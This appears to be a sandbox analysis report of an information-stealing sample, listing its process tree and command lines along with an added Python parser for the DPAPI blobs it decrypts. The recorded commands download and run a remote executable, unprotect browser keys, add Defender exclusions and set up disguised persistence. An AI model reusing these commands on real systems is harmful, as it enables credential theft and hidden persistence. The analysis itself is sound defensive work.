PID 2640 wrote to memory of 1104 N/A C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe C:\Windows\system32\curl.exe
PID 1104 wrote to memory of 3104 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1104 wrote to memory of 3104 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1104 wrote to memory of 4124 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1104 wrote to memory of 4124 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4124 wrote to memory of 4540 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 4124 wrote to memory of 4540 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 4540 wrote to memory of 2740 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\system32\cmd.exe
PID 4540 wrote to memory of 2740 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\system32\cmd.exe
PID 2640 wrote to memory of 564 N/A C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe C:\Windows\system32\cmd.exe
PID 2640 wrote to memory of 564 N/A C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe C:\Windows\system32\cmd.exe
PID 564 wrote to memory of 1540 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 564 wrote to memory of 1540 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2640 wrote to memory of 2976 N/A C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe C:\Windows\system32\cmd.exe
PID 2640 wrote to memory of 2976 N/A C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe C:\Windows\system32\cmd.exe
PID 2976 wrote to memory of 728 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 2976 wrote to memory of 728 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 2640 wrote to memory of 996 N/A C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe C:\Windows\system32\find.exe
PID 2640 wrote to memory of 996 N/A C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe C:\Windows\system32\find.exe
PID 2640 wrote to memory of 1276 N/A C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe C:\Windows\system32\cmd.exe
PID 2640 wrote to memory of 1276 N/A C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe C:\Windows\system32\cmd.exe
PID 996 wrote to memory of 4328 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 996 wrote to memory of 4328 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 1276 wrote to memory of 3860 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1276 wrote to memory of 3860 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2640 wrote to memory of 1936 N/A C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2640 wrote to memory of 1936 N/A C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1936 wrote to memory of 4900 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1936 wrote to memory of 4900 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2640 wrote to memory of 2860 N/A C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe C:\Windows\system32\cmd.exe
PID 2640 wrote to memory of 2860 N/A C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe C:\Windows\system32\cmd.exe
PID 2640 wrote to memory of 2440 N/A C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2640 wrote to memory of 2440 N/A C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2640 wrote to memory of 736 N/A C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe C:\Windows\system32\cmd.exe
PID 2640 wrote to memory of 736 N/A C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe C:\Windows\system32\cmd.exe
PID 2640 wrote to memory of 4320 N/A C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe C:\Windows\system32\cmd.exe
PID 2640 wrote to memory of 4320 N/A C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe C:\Windows\system32\cmd.exe
PID 2440 wrote to memory of 1568 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 2440 wrote to memory of 1568 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 2860 wrote to memory of 1512 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 2860 wrote to memory of 1512 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 2640 wrote to memory of 2376 N/A C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe C:\Windows\system32\cmd.exe
PID 2640 wrote to memory of 2376 N/A C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe C:\Windows\system32\cmd.exe
PID 736 wrote to memory of 2780 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 736 wrote to memory of 2780 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 4320 wrote to memory of 1884 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4320 wrote to memory of 1884 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2376 wrote to memory of 2300 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2376 wrote to memory of 2300 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2640 wrote to memory of 4768 N/A C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe C:\Windows\system32\cmd.exe
PID 2640 wrote to memory of 4768 N/A C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe C:\Windows\system32\cmd.exe
PID 2640 wrote to memory of 3272 N/A C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe C:\Windows\system32\cmd.exe
PID 2640 wrote to memory of 3272 N/A C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe C:\Windows\system32\cmd.exe
PID 2640 wrote to memory of 4956 N/A C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe C:\Windows\system32\cmd.exe
PID 2640 wrote to memory of 4956 N/A C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe C:\Windows\system32\cmd.exe
PID 4768 wrote to memory of 3308 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cscript.exe
PID 4768 wrote to memory of 3308 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cscript.exe
PID 3272 wrote to memory of 3808 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 3272 wrote to memory of 3808 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Executor\Xylex.bat"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell $down=New-Object System.Net.WebClient;$url='https://github.com/xylexV5/xylexz/releases/download/vypix/xylex.exe';$file='xylex.exe'; $down.DownloadFile($url,$file);$exec=New-Object -com shell.application;$exec.shellexecute($file);exit

C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe

"C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "type .\temp.ps1 | powershell.exe -noprofile -"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" type .\temp.ps1 "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -noprofile -

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\sctyk5ct\sctyk5ct.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES566D.tmp" "c:\Users\Admin\AppData\Local\Temp\sctyk5ct\CSCD9AAD5F942E444D0BE4875BB10432BE9.TMP"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,238,156,48,203,153,40,183,74,155,57,209,91,118,45,98,188,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,240,132,237,149,45,67,26,224,155,156,8,181,224,96,78,151,154,46,202,101,249,97,141,165,239,101,32,47,174,213,144,44,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,5,118,4,252,204,118,149,111,47,84,90,247,149,190,34,249,18,252,47,179,62,225,47,93,195,23,120,101,61,101,30,235,48,0,0,0,144,60,90,153,163,30,104,172,123,39,168,11,95,160,138,71,243,107,144,2,50,45,70,124,4,172,47,165,61,165,64,105,236,53,38,158,175,136,209,149,37,63,179,220,166,88,37,85,64,0,0,0,118,167,221,170,254,48,117,31,150,36,196,116,199,187,171,38,184,48,64,53,110,62,94,141,234,254,235,232,6,73,237,45,142,243,225,206,25,5,10,78,242,193,201,184,107,245,34,156,238,170,149,227,218,151,82,101,219,166,72,147,198,231,15,120), $null, 'CurrentUser')"

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,238,156,48,203,153,40,183,74,155,57,209,91,118,45,98,188,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,240,132,237,149,45,67,26,224,155,156,8,181,224,96,78,151,154,46,202,101,249,97,141,165,239,101,32,47,174,213,144,44,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,5,118,4,252,204,118,149,111,47,84,90,247,149,190,34,249,18,252,47,179,62,225,47,93,195,23,120,101,61,101,30,235,48,0,0,0,144,60,90,153,163,30,104,172,123,39,168,11,95,160,138,71,243,107,144,2,50,45,70,124,4,172,47,165,61,165,64,105,236,53,38,158,175,136,209,149,37,63,179,220,166,88,37,85,64,0,0,0,118,167,221,170,254,48,117,31,150,36,196,116,199,187,171,38,184,48,64,53,110,62,94,141,234,254,235,232,6,73,237,45,142,243,225,206,25,5,10,78,242,193,201,184,107,245,34,156,238,170,149,227,218,151,82,101,219,166,72,147,198,231,15,120), $null, 'CurrentUser')

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,238,156,48,203,153,40,183,74,155,57,209,91,118,45,98,188,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,30,33,9,7,82,225,214,92,15,159,202,147,139,45,89,87,231,151,227,53,170,79,92,11,223,143,97,106,97,154,161,9,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,21,253,137,58,142,103,70,102,12,189,67,174,111,249,213,75,220,211,167,169,116,14,13,182,98,95,162,252,2,230,176,103,48,0,0,0,52,214,32,138,26,48,216,25,50,239,33,228,149,1,46,204,28,5,199,198,129,96,1,203,31,101,98,78,63,94,55,14,217,3,117,232,82,31,234,98,233,98,205,228,177,255,26,93,64,0,0,0,130,107,36,32,57,149,185,197,48,184,95,52,114,206,152,10,184,207,1,53,59,142,23,125,248,153,95,41,99,30,222,95,238,92,97,132,248,36,245,34,7,59,219,119,201,126,196,81,133,18,22,202,225,208,186,249,141,11,195,129,16,159,30,250), $null, 'CurrentUser')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,238,156,48,203,153,40,183,74,155,57,209,91,118,45,98,188,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,30,33,9,7,82,225,214,92,15,159,202,147,139,45,89,87,231,151,227,53,170,79,92,11,223,143,97,106,97,154,161,9,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,21,253,137,58,142,103,70,102,12,189,67,174,111,249,213,75,220,211,167,169,116,14,13,182,98,95,162,252,2,230,176,103,48,0,0,0,52,214,32,138,26,48,216,25,50,239,33,228,149,1,46,204,28,5,199,198,129,96,1,203,31,101,98,78,63,94,55,14,217,3,117,232,82,31,234,98,233,98,205,228,177,255,26,93,64,0,0,0,130,107,36,32,57,149,185,197,48,184,95,52,114,206,152,10,184,207,1,53,59,142,23,125,248,153,95,41,99,30,222,95,238,92,97,132,248,36,245,34,7,59,219,119,201,126,196,81,133,18,22,202,225,208,186,249,141,11,195,129,16,159,30,250), $null, 'CurrentUser')
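The two ProtectedData.Unprotect calls above carry the DPAPI blobs inline, so they can be read without running the sample. The script below is an added analysis example, not code from the sample or from the sandbox; it parses the DPAPI blob header (the layout documented by mimikatz and dpapick) for both byte arrays copied from this report. The parse shows that both blobs were protected with AES-256 and SHA-512 under the same per-user master key (GUID cb309cee-2899-4ab7-9b39-d15b762d62bc, which names the master-key file under %APPDATA%\Microsoft\Protect\<SID>\), that the first has an empty description while the second is described as "Edge" and carries CRYPTPROTECT_AUDIT, and that each holds 48 bytes of ciphertext. An inference, not something the report states: 48 bytes of AES-256-CBC output is exactly a 32-byte key plus one padding block, which fits a Chromium os_crypt master key, consistent with the "Reads user/profile data of web browsers" signature; the helper that strips Chromium's "DPAPI" prefix from a Local State encrypted_key value rests on that assumption, and SAMPLE_LOCAL_STATE_KEY is constructed from blob 1 for the round-trip.

```python
"""Parse the header of a Windows DPAPI (CryptProtectData) blob.

Added analysis example; not code from the sample or from the sandbox report.
It decodes the two byte arrays the sample passes to
System.Security.Cryptography.ProtectedData.Unprotect in the process list above,
so an analyst can see what is being decrypted without running the malware.
Field order is the DPAPI blob layout documented by mimikatz/dpapick: every
variable-length field is preceded by a DWORD length.
"""
import base64
import struct
import uuid

ALG_NAMES = {0x6610: "CALG_AES_256", 0x6603: "CALG_3DES", 0x8004: "CALG_SHA1", 0x800E: "CALG_SHA_512"}  # wincrypt.h ALG_IDs
FLAG_NAMES = {0x01: "UI_FORBIDDEN", 0x04: "LOCAL_MACHINE", 0x08: "CRED_SYNC", 0x10: "AUDIT"}  # CRYPTPROTECT_* flags
DPAPI_PROVIDER_GUID = "df9d8cd0-1501-11d1-8c7a-00c04fc297eb"  # fixed provider GUID present in every DPAPI blob
CHROMIUM_KEY_PREFIX = b"DPAPI"  # Chromium stores os_crypt.encrypted_key as base64("DPAPI" + blob) in Local State

# Blob 1, copied from the report (empty description). Comments mark field boundaries.
BLOB_EMPTY_DESC = bytes([
    1,0,0,0, 208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235, 1,0,0,0,      # dwVersion, guidProvider, dwMasterKeyVersion
    238,156,48,203,153,40,183,74,155,57,209,91,118,45,98,188, 0,0,0,0, 2,0,0,0, 0,0,  # guidMasterKey, dwFlags, dwDescriptionLen + L""
    16,102,0,0, 0,1,0,0, 32,0,0,0,                                                   # algCrypt=AES_256, 256 bits, dwSaltLen
    240,132,237,149,45,67,26,224,155,156,8,181,224,96,78,151,154,46,202,101,249,97,141,165,239,101,32,47,174,213,144,44,
    0,0,0,0, 14,128,0,0, 0,2,0,0, 32,0,0,0,                                          # dwHmacKeyLen=0, algHash=SHA_512, 512 bits, dwHmac2KeyLen
    5,118,4,252,204,118,149,111,47,84,90,247,149,190,34,249,18,252,47,179,62,225,47,93,195,23,120,101,61,101,30,235,
    48,0,0,0,                                                                         # dwDataLen
    144,60,90,153,163,30,104,172,123,39,168,11,95,160,138,71,243,107,144,2,50,45,70,124,4,172,47,165,61,165,64,105,236,53,38,158,175,136,209,149,37,63,179,220,166,88,37,85,
    64,0,0,0,                                                                         # dwSignLen
    118,167,221,170,254,48,117,31,150,36,196,116,199,187,171,38,184,48,64,53,110,62,94,141,234,254,235,232,6,73,237,45,142,243,225,206,25,5,10,78,242,193,201,184,107,245,34,156,238,170,149,227,218,151,82,101,219,166,72,147,198,231,15,120,
])
# Blob 2, copied from the report (description L"Edge", dwFlags = 0x10).
BLOB_EDGE = bytes([
    1,0,0,0, 208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235, 1,0,0,0,
    238,156,48,203,153,40,183,74,155,57,209,91,118,45,98,188, 16,0,0,0, 10,0,0,0, 69,0,100,0,103,0,101,0,0,0,
    16,102,0,0, 0,1,0,0, 32,0,0,0,
    30,33,9,7,82,225,214,92,15,159,202,147,139,45,89,87,231,151,227,53,170,79,92,11,223,143,97,106,97,154,161,9,
    0,0,0,0, 14,128,0,0, 0,2,0,0, 32,0,0,0,
    21,253,137,58,142,103,70,102,12,189,67,174,111,249,213,75,220,211,167,169,116,14,13,182,98,95,162,252,2,230,176,103,
    48,0,0,0,
    52,214,32,138,26,48,216,25,50,239,33,228,149,1,46,204,28,5,199,198,129,96,1,203,31,101,98,78,63,94,55,14,217,3,117,232,82,31,234,98,233,98,205,228,177,255,26,93,
    64,0,0,0,
    130,107,36,32,57,149,185,197,48,184,95,52,114,206,152,10,184,207,1,53,59,142,23,125,248,153,95,41,99,30,222,95,238,92,97,132,248,36,245,34,7,59,219,119,201,126,196,81,133,18,22,202,225,208,186,249,141,11,195,129,16,159,30,250,
])
# Constructed for the example: blob 1 as it would appear in a Chromium "Local State" file.
SAMPLE_LOCAL_STATE_KEY = base64.b64encode(CHROMIUM_KEY_PREFIX + BLOB_EMPTY_DESC).decode()


def parse_dpapi_blob(blob: bytes) -> dict:
    """Return the header fields of a DPAPI blob; raise ValueError if it is malformed."""
    off = 0

    def u32() -> int:
        nonlocal off
        if off + 4 > len(blob):
            raise ValueError("blob truncated at offset %d" % off)
        (v,) = struct.unpack_from("<I", blob, off)
        off += 4
        return v

    def take(n: int) -> bytes:
        nonlocal off
        if off + n > len(blob):
            raise ValueError("blob truncated at offset %d" % off)
        off += n
        return blob[off - n:off]

    version = u32()
    provider = str(uuid.UUID(bytes_le=take(16)))
    if provider != DPAPI_PROVIDER_GUID:
        raise ValueError("not a DPAPI blob, provider GUID %s" % provider)
    mk_version = u32()
    master_key = str(uuid.UUID(bytes_le=take(16)))
    flags = u32()
    description = take(u32()).decode("utf-16-le").rstrip("\x00")
    alg_crypt, crypt_bits = u32(), u32()
    salt = take(u32())
    take(u32())                                   # legacy pbHmacKey, empty on current Windows
    alg_hash, hash_bits = u32(), u32()
    hmac2_key = take(u32())
    data = take(u32())
    sign = take(u32())
    if off != len(blob):
        raise ValueError("%d trailing bytes after signature" % (len(blob) - off))
    return {
        "version": version, "master_key_version": mk_version,
        "master_key_guid": master_key,            # names the file under %APPDATA%\Microsoft\Protect\<SID>\
        "flags": [n for bit, n in FLAG_NAMES.items() if flags & bit],
        "description": description,
        "cipher": ALG_NAMES.get(alg_crypt, hex(alg_crypt)), "cipher_bits": crypt_bits,
        "salt_len": len(salt), "hmac2_key_len": len(hmac2_key),
        "hash": ALG_NAMES.get(alg_hash, hex(alg_hash)), "hash_bits": hash_bits,
        "data_len": len(data), "sign_len": len(sign),
    }


def chromium_local_state_key_to_blob(encrypted_key_b64: str) -> bytes:
    """Strip Chromium's 'DPAPI' prefix from a Local State os_crypt.encrypted_key value."""
    raw = base64.b64decode(encrypted_key_b64)
    if not raw.startswith(CHROMIUM_KEY_PREFIX):
        raise ValueError("missing DPAPI prefix; not a Chromium-wrapped key")
    return raw[len(CHROMIUM_KEY_PREFIX):]


if __name__ == "__main__":
    for name, blob in (("blob 1", BLOB_EMPTY_DESC), ("blob 2", BLOB_EDGE)):
        print(name, parse_dpapi_blob(blob))
```

The master key GUID is the pivot for an investigator: the same GUID in both blobs means a single user master key (and therefore that user's logon secret or a domain backup key) unlocks everything the sample collected, which is why it calls Unprotect with the 'CurrentUser' scope from inside the victim's session rather than from the SYSTEM-level scheduled task created later in the list.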

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic diskdrive get serialnumber"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Steam /f"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "schtasks /create /tn "GoogleUpdateTaskMachineUAC" /tr "cscript //nologo C:\ProgramData\edge\Updater\RunBatHidden.vbs" /sc minute /mo 10 /f /RU SYSTEM"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\edge\Updater\Get-Clipboard.ps1""

C:\Windows\system32\reg.exe

reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Steam /f

C:\Windows\System32\Wbem\WMIC.exe

wmic diskdrive get serialnumber

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\system32\schtasks.exe

schtasks /create /tn "GoogleUpdateTaskMachineUAC" /tr "cscript //nologo C:\ProgramData\edge\Updater\RunBatHidden.vbs" /sc minute /mo 10 /f /RU SYSTEM

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\edge\Updater\Get-Clipboard.ps1"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "cscript //nologo "C:\ProgramData\edge\Updater\RunBatHidden.vbs""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic baseboard get serialnumber"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

C:\Windows\system32\cscript.exe

cscript //nologo "C:\ProgramData\edge\Updater\RunBatHidden.vbs"

C:\Windows\System32\Wbem\WMIC.exe

wmic baseboard get serialnumber

C:\Windows\System32\Wbem\WMIC.exe

wmic MemoryChip get /format:list

C:\Windows\system32\find.exe

find /i "Speed"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\rvdillkg\rvdillkg.cmdline"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\ProgramData\edge\Updater\CheckEpicGamesLauncher.bat" "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5A64.tmp" "c:\Users\Admin\AppData\Local\Temp\rvdillkg\CSCFC39675825334B599630273D765063DF.TMP"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_computersystemproduct get uuid"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_computersystemproduct get uuid

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic PATH Win32_VideoController GET Description,PNPDeviceID"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\System32\Wbem\WMIC.exe

wmic PATH Win32_VideoController GET Description,PNPDeviceID

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic memorychip get serialnumber"

C:\Windows\System32\Wbem\WMIC.exe

wmic memorychip get serialnumber

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic csproduct get uuid"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\System32\Wbem\WMIC.exe

wmic csproduct get uuid

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic cpu get processorid"

C:\Windows\System32\Wbem\WMIC.exe

wmic cpu get processorid

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "getmac /NH"

C:\Windows\system32\getmac.exe

getmac /NH

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Windows\system32\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Steam" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe" /f

C:\Windows\system32\reg.exe

reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Steam"

C:\Windows\system32\curl.exe

curl -o "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Steam_Service.exe" YOUR-BINDED-EXE-LINK-HERE

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

C:\Windows\System32\Wbem\WMIC.exe

wmic MemoryChip get /format:list

C:\Windows\system32\find.exe

find /i "Speed"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

C:\Windows\System32\Wbem\WMIC.exe

wmic MemoryChip get /format:list

C:\Windows\system32\find.exe

find /i "Speed"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

